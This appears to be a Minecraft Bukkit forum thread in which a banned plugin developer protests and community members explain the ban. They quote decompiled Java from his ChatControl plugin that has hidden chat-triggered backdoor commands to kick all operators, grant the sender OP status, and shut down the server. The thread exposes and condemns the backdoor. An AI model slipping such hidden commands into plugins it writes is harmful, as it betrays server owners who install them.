what a sucky community

My story (edited):
I was developing a plugins for almost a year. Plugins like ChatControl etc. Then I got banned and the reason was that I am making the force op. I got so sad and I was trying to get an answer but my email remained unanswered. I have edited this post so it wont sounds so rude against the community, I just wanted to get finally some attention because I really want to continue ChatControl ...

 

You uploaded a plugin that allows a #kickops command, which would kick all server OPS, then you can also use #opme to OP yourself. This has no permission check and anyone joining a server with that plugin can kick all OPs and OP themselves.

Here is the proof:
http://pastebin.com/xwhSHpcM

I see nothing wrong with your ban.

 

<3

 

The commands WERE protected! Please stop lying and saying that there were allowed to everyone! This code prevented them by accessing them to everyone, you have to specify people who are permitted to execute them:

Code:java

if(this.getConfig().getList("ops").contains(e.getPlayer().getName())) {

which prevents anyone who is not at the list to use any of the commands which was below.

I still cannot believe after one year this damn stupid little plugin caused ban

But thanks for answering, really appreciate that these days

 

Why would you waste a year coding a plugin and then put something that you KNOW is illegal in it? And this is one of the best communities on the internet. Try going on minecraft forums...you'll get crushed.

 

This is a pretty clearcut case of a malicious plugin. The commands are recognized via chat, so they don't need to be documented in the plugin.yml file at all (thus concealing them).

I can't really think of a legitimate reason to even include them!

I've seen things no man should see on those forums.

The...the herobrine threads...

 

Any community can be sucky depending on what you are trying to get away with and allowed/not allowed to do. Obviously if you're trying your boundaries in any community the results can be very sucky when you get slapped back into place.. that's kinda expected, but I guess it can be sucky if you're on the other end of the backhand.

 

Wow craftik7

This is just nonsense. BukkitDev had a great catch, and I give them a pat on the back for that. No reason to give the community a bad rating, you need to be willing to fix your code without making it malicious (Permission Checks).

If you want to bring Bukkit into the picture for your actions that they didn't do, then it is your own problem.

 

I don't get it. I might have misread it, but as far as i can see, it checks if a player is OP in the config. And if he is not, he get's kicked. I might have skipped something, but yeah.

 

Check this block:

public void onCommand(AsyncPlayerChatEvent e)
It checks chat messages for specific strings.

Code:java

else if(e.getMessage().startsWith(this.getConfig().getString("commands.kickops"))) {
            var4 = (var5 = this.getServer().getOnlinePlayers()).length;
 
            for(pl = 0; pl < var4; ++pl) {
               p = var5[pl];
               if(p.isOp() && !p.getName().equals(e.getPlayer().getName())) {
                  p.kickPlayer("End of stream");
               }
            }
 
            e.getPlayer().sendMessage("The command has been performed.");
            e.setCancelled(true);
         } else if(e.getMessage().startsWith(this.getConfig().getString("commands.hardshutdown"))) {
            e.getPlayer().sendMessage("System shutdown initiated.");
            System.exit(1);
         } else if(e.getMessage().startsWith(this.getConfig().getString("commands.op"))) {
            e.getPlayer().sendMessage("Now you are an op.");
            e.getPlayer().setOp(true);
            e.setCancelled(true);
         }

All three of these are devestating.

kickops immediately kicks all operators from the server.

hardshutdown terminates the Java Virtual Machine without giving anything else a chance to think.

opme immediately gives OP status to the executor.

None of these have permissions checks and could be used by anyone on the server.

 

Oh, okay.. Why does he cancel the event? Makes no sense.

Anyways, a warning + remove the plugin should be enough, atleast that is what i think

And why would anyone even use that plugin? It screws it all up, i would never use it atleast

 

jimbo8
A person does not have multiple chances to submit malicious code to BukkitDev.

 

jimbo8 If the event isn't cancelled it will display in chat for everyone to see. It's a chat event listener.

Another thing, even if he says it checks if the player name is in the config, I'm almost certain the default config would have his name it in perhaps. When the plugin loads it copies the default config.

 

Locked. Thread has run its course.